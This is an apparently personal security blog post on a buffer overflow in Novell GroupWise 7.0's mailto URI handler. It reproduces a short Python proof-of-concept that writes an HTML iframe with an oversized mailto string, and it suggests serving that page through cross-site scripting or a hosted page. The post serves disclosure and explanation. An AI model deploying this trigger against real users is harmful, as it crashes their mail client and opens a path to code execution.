Novell GroupWise 'mailto' URI handler buffer overflow vulnerability
Researcher Juan Pablo Lopez Yacubian has reported another URI abuse exploit.
Novell GroupWise is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects GroupWise 7.0; other versions may also be affected.
Hmm... When I mentioned URI abuse last week, I said there would be more didn't I?
I'm working on a few myself, this one is pretty nasty since most browsers will accept mailto: URIs without any confirmation, meaning you get cross-site scripted, it forces trigger of a mailto URI and your pwned. Game over, thanks for playing.
The researcher attached code to Security Focus as a proof of concept, and here's the actual code from that Python file:
#!/usr/bin/python
a = "<iframe src='mailto:" a += "A" * 1530 a += "\x61\x61\x61\x61" a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"
file = open("test.html", "w") file.write(a) file.close()
So, basically, this is a simple python script that will create the exploit code for you, which you would then deploy using cross-site scripting or host on your own page, whatever. The code does not contain a malicious payload, it's simply proof of concept to cause the crash, so feel free to play with it if you'd like.
On to Juan Pablo, congrats to him. He's on a roll. This is the same researcher that earlier this week brought us another Trillian exploit.
-Nate